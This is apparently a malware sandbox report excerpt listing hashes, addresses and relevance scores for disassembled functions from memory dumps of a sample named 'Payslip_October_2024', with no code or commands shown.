                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 1624885640596687c9826a806f1d5ba5ccb0cb8fec62bac7aa7e49e1eed7355e
                                                                                                            • Instruction ID: 2cb5066df245308abcbcd9dc9c274fc25d41ad4b80f8f9f1a35d9e206565c048
                                                                                                            • Opcode Fuzzy Hash: 1624885640596687c9826a806f1d5ba5ccb0cb8fec62bac7aa7e49e1eed7355e
                                                                                                            • Instruction Fuzzy Hash: 7F312470B102168FDB59AB74C52476E7BE6AF89300F144529D406DB392EF36CE42CBA2
                                                                                                            Function 066221D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: adbd0bb438bd89992474aeb576451302d80b020b73bcff7eafc9c1d1ae49bbb9
                                                                                                            • Instruction ID: 95ee0d604b07f6d462a077364774b342ccb56ece8c868bf6567c1354be8d5a54
                                                                                                            • Opcode Fuzzy Hash: adbd0bb438bd89992474aeb576451302d80b020b73bcff7eafc9c1d1ae49bbb9
                                                                                                            • Instruction Fuzzy Hash: 9831F270B102168FCB55AB74C52476E7BE6AB89700F204429D406DB391EE36DE42CBA2
                                                                                                            Function 06624BD9 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Ocq
                                                                                                            • API String ID: 0-2995510325
                                                                                                            • Opcode ID: 87d139dae569cc80444b70b107b7563862345da94549a995ecf00fa17eb1165f
                                                                                                            • Instruction ID: 556c4a6ab73261b2bd351568407f946976773e0c1e719978a341632bde1a0ed0
                                                                                                            • Opcode Fuzzy Hash: 87d139dae569cc80444b70b107b7563862345da94549a995ecf00fa17eb1165f
                                                                                                            • Instruction Fuzzy Hash: D121F331B0062A9FEB209F68DC91B6FBAE6FB84710F204529F41AD7381CE759C018BC0
                                                                                                            Function 04FB0C1D Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: E
                                                                                                            • API String ID: 0-3568589458
                                                                                                            • Opcode ID: 94abae6e4192aa8da74d19200aae78db844e08f6f0b54b0b754035ccc7db946b
                                                                                                            • Instruction ID: 88365cc48d11b9b9bac16e2b13fb8b928dc6af10f5e94a123b15956e6ebb7d71
                                                                                                            • Opcode Fuzzy Hash: 94abae6e4192aa8da74d19200aae78db844e08f6f0b54b0b754035ccc7db946b
                                                                                                            • Instruction Fuzzy Hash: 172127B1D053588FCB11DFAAD9446DEFFF4FB49310F14845AD458A3241C778A909CBA5
                                                                                                            Function 066283E0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q
                                                                                                            • API String ID: 0-388095546
                                                                                                            • Opcode ID: 0dc1d24d561a09f81f68a9f9503489911d447bbe45b27897092b6cb50a88829b
                                                                                                            • Instruction ID: b822248718408de1744021b41885d7eac21a5d9618cc6386f6e50efe8af88095
                                                                                                            • Opcode Fuzzy Hash: 0dc1d24d561a09f81f68a9f9503489911d447bbe45b27897092b6cb50a88829b
                                                                                                            • Instruction Fuzzy Hash: E2F0AF31A00A328FDF689E54ED806A8B7A9EB80315F14846ED805DB346D631E91ECF51
                                                                                                            Function 06624B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Ocq
                                                                                                            • API String ID: 0-2995510325
                                                                                                            • Opcode ID: 570dd0b92213a4fa0a04e42630cf0f8878a70807388c2999c358813be4273cb8
                                                                                                            • Instruction ID: 85fce0df637982f38a6b3609c09fbfc440add72f4ec175f20d390bb70c7ed2c9
                                                                                                            • Opcode Fuzzy Hash: 570dd0b92213a4fa0a04e42630cf0f8878a70807388c2999c358813be4273cb8
                                                                                                            • Instruction Fuzzy Hash: 90F0DA30A2022ADFDB14DF94E899BAEBBB2BF88701F204119E402A7395CF741D01CF81
                                                                                                            Function 0662C2A8 Relevance: .6, Instructions: 636COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a61f1bab9be9d38bb99645192bb81527c747386eb074f28584c80e1c88881e5
                                                                                                            • Instruction ID: 1b4302536a4eb969fc1e1df13f2a0e09992c58468984132dfe0ad34f26d38497
                                                                                                            • Opcode Fuzzy Hash: 9a61f1bab9be9d38bb99645192bb81527c747386eb074f28584c80e1c88881e5
                                                                                                            • Instruction Fuzzy Hash: 5A328334B006168FDB94DB68D890BAEB7B2FB88314F148925E409EB355DB35EC46CF91
                                                                                                            Function 04FB43F8 Relevance: .4, Instructions: 436COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e1a4b9cb0b066f92175f0dafdbe0a51259f67657fe9588148d46bf482fb2933e
                                                                                                            • Instruction ID: 20fb979e96b9340aafbfa1cb5a1c1c612762dfba55cd4b911eda08242aec0463
                                                                                                            • Opcode Fuzzy Hash: e1a4b9cb0b066f92175f0dafdbe0a51259f67657fe9588148d46bf482fb2933e
                                                                                                            • Instruction Fuzzy Hash: 8651E731E007459FDB05DF69C8906DDBBF1FF86300F14C659D489AB252EB70A986CB90
                                                                                                            Function 06626300 Relevance: .2, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c14d7e75675412792d0820bdafe4f01f1351e06dd9afb8fd556d989e87f42d50
                                                                                                            • Instruction ID: 78802e40c1c6cafeeb3cf7252d6d1a67fd3b926c6ea000683ed5ced7e0b31081
                                                                                                            • Opcode Fuzzy Hash: c14d7e75675412792d0820bdafe4f01f1351e06dd9afb8fd556d989e87f42d50
                                                                                                            • Instruction Fuzzy Hash: 7B61C171F005224FCF519A7DC88466FBAD7AFC5620B25443AE80EDB364EE65DD028BC6
                                                                                                            Function 066243B2 Relevance: .2, Instructions: 224COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6da5404c69e27e079f50083ffb375b0d2c602b7ab5f295700ad91387a73616f1
                                                                                                            • Instruction ID: b211d87f63d450264d34dabdc95a59be679535a766ccdb1c94510b8566ec2e84
                                                                                                            • Opcode Fuzzy Hash: 6da5404c69e27e079f50083ffb375b0d2c602b7ab5f295700ad91387a73616f1
                                                                                                            • Instruction Fuzzy Hash: D3814030B0061A9FDB54DFA9D49479EB7F6EB85304F108425D40AEB394EF34DC428B52
                                                                                                            Function 066246CC Relevance: .2, Instructions: 214COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7d6dfdd8acebbf2986164a2303dd3b1ff2ec4d56c4df153d84e69de1222ce856
                                                                                                            • Instruction ID: 66c1d5ae1c3aec418f6fb5c508a05353781ffed5c0a39abd7ea2dcb5db574b01
                                                                                                            • Opcode Fuzzy Hash: 7d6dfdd8acebbf2986164a2303dd3b1ff2ec4d56c4df153d84e69de1222ce856
                                                                                                            • Instruction Fuzzy Hash: EB914D74E0061A8BDF60DF68C88079DB7B1FF89310F208695D54DBB395EB70AA858F51
                                                                                                            Function 066246E0 Relevance: .2, Instructions: 210COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 425ce15bda4479a1bec747cd57ff4b61ccc9dd3b3683dbc1962dc24c581af673
                                                                                                            • Instruction ID: e2480fc4e530a7c42bacc94e94c4fe4183ad3ef607144edd2e0ee547aaf3aedb
                                                                                                            • Opcode Fuzzy Hash: 425ce15bda4479a1bec747cd57ff4b61ccc9dd3b3683dbc1962dc24c581af673
                                                                                                            • Instruction Fuzzy Hash: 11914E34E1061A8BDF60DF68C880B9DB7B1FF89310F208695D55DBB345EB70AA858F51
                                                                                                            Function 04FB1A98 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d1af3d24793daed399bcd8c38cfc49701d1995fb12785d42d4f0a2bd72d2d28b
                                                                                                            • Instruction ID: 98b3158a22711fcd04b207fe8b184972875976a277f4dd86245d3da894459e6a
                                                                                                            • Opcode Fuzzy Hash: d1af3d24793daed399bcd8c38cfc49701d1995fb12785d42d4f0a2bd72d2d28b
                                                                                                            • Instruction Fuzzy Hash: 63719C70D003098FCB10EFAAD9946DEFBF5FF49310F14896AD499A7210EB34A946CB91
                                                                                                            Function 0662F040 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9466359e00e312218b0cdc80d2349ba0fa409235a13c88bd76a6dfbf7277ffc7
                                                                                                            • Instruction ID: 2a1a0362e5b16eb37ce6d2c2a2cc13065ce6ad588ff28d4b80b025aae3592241
                                                                                                            • Opcode Fuzzy Hash: 9466359e00e312218b0cdc80d2349ba0fa409235a13c88bd76a6dfbf7277ffc7
                                                                                                            • Instruction Fuzzy Hash: 59713A70A016199FDB54DFA8C990A9DBBF6FF84300F24852AE409EB355DB30ED46CB51
                                                                                                            Function 0662F031 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d97c30c8735c5f194f9c35a5ffb26b4c3418b3826e0bc5fb6b31e8af629f862
                                                                                                            • Instruction ID: 30e5eade95696cb3d6f5f7b052138394b8a82941da89c24c32a9b8677646829b
                                                                                                            • Opcode Fuzzy Hash: 4d97c30c8735c5f194f9c35a5ffb26b4c3418b3826e0bc5fb6b31e8af629f862
                                                                                                            • Instruction Fuzzy Hash: E0714A70E016198FDB54DFA8D990A9DBBF6FF84300F24842AE409EB355DB30E946CB41
                                                                                                            Function 0662FCC1 Relevance: .2, Instructions: 175COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7065682adb39ead302100feae6318400feffeda44f74e992b770b0be91c4c24b
                                                                                                            • Instruction ID: cfffc1e32dd082095998d8b0104f4d4136e7c235b6d0d2490d53075cd024a9e8
                                                                                                            • Opcode Fuzzy Hash: 7065682adb39ead302100feae6318400feffeda44f74e992b770b0be91c4c24b
                                                                                                            • Instruction Fuzzy Hash: 6051E131F005169FDF65EB78E8446AEBBB2EB84315F10886AE00AD7351DF318955CB81
                                                                                                            Function 0662FA70 Relevance: .2, Instructions: 170COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1872191bb75e9f7accf5c63f1fdf93a0fc9da79f2ba8c965b29544e122e2c8bf
                                                                                                            • Instruction ID: d31939eb9abbe3b4d303417ca2eda7b49c441a3316ca6f9e0b9b9a1de4090938
                                                                                                            • Opcode Fuzzy Hash: 1872191bb75e9f7accf5c63f1fdf93a0fc9da79f2ba8c965b29544e122e2c8bf
                                                                                                            • Instruction Fuzzy Hash: 9251F470B202259BEF64667CD964B2F26AAD78D706F20442AE50EC77D4DF38CC419B92
                                                                                                            Function 0662FA80 Relevance: .2, Instructions: 163COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a1dbd20d6ee11026ed0a0c4b3c5584f3c80e8c11e00dd50cf7bbf658c3b67ecb
                                                                                                            • Instruction ID: 2721aee9d164d04eb9dad2b92e5613c0427706b7eb2ded4706d11c2255548c8c
                                                                                                            • Opcode Fuzzy Hash: a1dbd20d6ee11026ed0a0c4b3c5584f3c80e8c11e00dd50cf7bbf658c3b67ecb
                                                                                                            • Instruction Fuzzy Hash: E651F970B202259BEF64666CD96472F36AAD78D702F20442AE50EC77D4DF3CCC419B92
                                                                                                            Function 06625522 Relevance: .1, Instructions: 131COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cca0ce35eaed210e7ca6eb25ceb1de600c61914b32bfd1fd8a68b7c8a5b54108
                                                                                                            • Instruction ID: c08df0dd403d75ef0cd0e24e37edd6cd54d81badc0cdda9f2f8f7c3817032b27
                                                                                                            • Opcode Fuzzy Hash: cca0ce35eaed210e7ca6eb25ceb1de600c61914b32bfd1fd8a68b7c8a5b54108
                                                                                                            • Instruction Fuzzy Hash: 36414C71E00A1A8FDB70CF99D8C1AAFFBB2EB84310F10492AE116D6650D334E9558F91
                                                                                                            Function 04FB1325 Relevance: .1, Instructions: 100COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1f126342776d1a8cb3c9d12fb46b347f20d487a005c3f7c214431f215c17872a
                                                                                                            • Instruction ID: 9b58be6439e0b824b9d6b8d870b6dbce0884d3cb23bc2d0bd54f5220510aa559
                                                                                                            • Opcode Fuzzy Hash: 1f126342776d1a8cb3c9d12fb46b347f20d487a005c3f7c214431f215c17872a
                                                                                                            • Instruction Fuzzy Hash: EB41E2B1D00309DBDB14DFAAC584ADEBBB5EF49344F248029D449AB211D775AA4ACF90
                                                                                                            Function 0662DA90 Relevance: .1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6e1d608da71940dab208e2423e1d89501ffed14cd4e24782466776a471a3070c
                                                                                                            • Instruction ID: 870ab51621cf7f65de72523ef15c2d428d76022bed83d6ab70ea4445d0e59e49
                                                                                                            • Opcode Fuzzy Hash: 6e1d608da71940dab208e2423e1d89501ffed14cd4e24782466776a471a3070c
                                                                                                            • Instruction Fuzzy Hash: BD31A270E1072A8BCF65DF68C89069EBBF2FF85305F148929E405EB741EB70E9468B41
                                                                                                            Function 04FB1330 Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3dd3af167ad433b791e6567c8ed0fa87dd92bfbbe3f7775221856f07753d1519
                                                                                                            • Instruction ID: 3eae7d71bf5fe6b82988efc013074b413d02cfd3cf6971b1bda1c467e5803aaf
                                                                                                            • Opcode Fuzzy Hash: 3dd3af167ad433b791e6567c8ed0fa87dd92bfbbe3f7775221856f07753d1519
                                                                                                            • Instruction Fuzzy Hash: 6641E2B1D00309CBDB14DFAAC584ADEBBF5BF49344F248029D448BB211D775AA4ACF90
                                                                                                            Function 06622081 Relevance: .1, Instructions: 95COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 698d3b4d53bd2d3f181805e48f065cc668b4bce022bd75d8ef525b1fe7f8570a
                                                                                                            • Instruction ID: f09d0131e4be689a00db0c80175825a62b6ac52f4946de494d17386a9f35090f
                                                                                                            • Opcode Fuzzy Hash: 698d3b4d53bd2d3f181805e48f065cc668b4bce022bd75d8ef525b1fe7f8570a
                                                                                                            • Instruction Fuzzy Hash: F3319034E106169BCB45DFA4D868A9EF7F6BF89310F148829E906A7341DB31AD42CF40
                                                                                                            Function 06622090 Relevance: .1, Instructions: 91COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e922d512090fbcd0b53349729cba589c75dc7adb313038829ed12451c097c59f
                                                                                                            • Instruction ID: 03ce2bab8f6ddb8b95289c3097f2b346f2842fde99587cb4280ff8dd230261b1
                                                                                                            • Opcode Fuzzy Hash: e922d512090fbcd0b53349729cba589c75dc7adb313038829ed12451c097c59f
                                                                                                            • Instruction Fuzzy Hash: 1031A030E106169BCB19CFA5D864A9EB7F6BF89300F148929E906E7340DB71ED82CF40
                                                                                                            Function 04FB1219 Relevance: .1, Instructions: 87COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f850b56dd4c8e5df3965bc1b92f272341df02ecf1bb031104eecdfcc35337d9
                                                                                                            • Instruction ID: 1cdf2621d43a83b2c1e0f0a6139e2d9cff46c050933512e435a6e2a34300ecfd
                                                                                                            • Opcode Fuzzy Hash: 8f850b56dd4c8e5df3965bc1b92f272341df02ecf1bb031104eecdfcc35337d9
                                                                                                            • Instruction Fuzzy Hash: F921F7B1A002048FC7119F79D4595EBBBF6EF81704705C4AAD14ADB351EF34DC0A8B91
                                                                                                            Function 04FB4ED9 Relevance: .1, Instructions: 83COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4141227634.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_4fb0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6ec028e4348b038aa99f4812376b82657a08d5b6e52f38a4bbf94fe7063ce83c
                                                                                                            • Instruction ID: 728d2303fe70b9679906e3d3eb26b1754c06ab75f6dc6655e653f81c7981e6d5
                                                                                                            • Opcode Fuzzy Hash: 6ec028e4348b038aa99f4812376b82657a08d5b6e52f38a4bbf94fe7063ce83c
                                                                                                            • Instruction Fuzzy Hash: 902124347002149FDB04EB78D960BAE3BF6EB88304F204429D50DD7B92EB35AD42C791
                                                                                                            Function 06623FB9 Relevance: .1, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0450e5d62579caf3223671be92bb34728c27b0d4e6e60a1d63a0b4ba87493818
                                                                                                            • Instruction ID: b47475fd83ac8ca3e22b3885a2dbe64e15318507e4743cdbfa9bc6c1f56a223d
                                                                                                            • Opcode Fuzzy Hash: 0450e5d62579caf3223671be92bb34728c27b0d4e6e60a1d63a0b4ba87493818
                                                                                                            • Instruction Fuzzy Hash: 5A218935E002169FDB40DF69D980BAEBBF5EB88750F108029E905E7384EB71ED518F91
                                                                                                            Function 06623FC8 Relevance: .1, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cda5991cca5dd945de41887dae8981b0cf970edb8d7b7bcf0107ede497168a5e
                                                                                                            • Instruction ID: 0c714971f2bc65c495e99ad7e743b61ecda49256eb724d207304005f3c19a071
                                                                                                            • Opcode Fuzzy Hash: cda5991cca5dd945de41887dae8981b0cf970edb8d7b7bcf0107ede497168a5e
                                                                                                            • Instruction Fuzzy Hash: A8218B75E006169FDB50DF68D980AAEBBF5EB88750F108029E905E7384EB71DD418F91
                                                                                                            Function 00BED006 Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4120519688.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_bed000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 95d32179a87aca4b211b132a4da8c3bd0af79202a744732d6a2e2afd5164a87d
                                                                                                            • Instruction ID: b223f8895c9bc33b4bd29b1e561696d887fc1d7a6cae7ad7b397205821481ff7
                                                                                                            • Opcode Fuzzy Hash: 95d32179a87aca4b211b132a4da8c3bd0af79202a744732d6a2e2afd5164a87d
                                                                                                            • Instruction Fuzzy Hash: 4C216F755093C49FC7038B24D9A0711BF71EB46214F29C5DBD9898B2A3C37A980ACB62
                                                                                                            Function 04FB4EE8 Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
